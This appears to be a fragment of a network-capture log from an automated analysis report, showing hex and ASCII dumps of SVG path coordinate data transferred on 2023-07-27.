                                                                                                                                                                                                                                                  Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3749INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                                                                                                  Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3765INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                  Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3781INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                                                                                                  Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3797INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                                                                                                  Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3813INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                                                                                                  Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3829INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3845INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:08 UTC3861INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                  Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4021INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                  Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4037INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4053INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                  Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4069INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                  Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4085INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                  Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4101INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                  Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4117INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                  Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4133INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:09 UTC4149INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
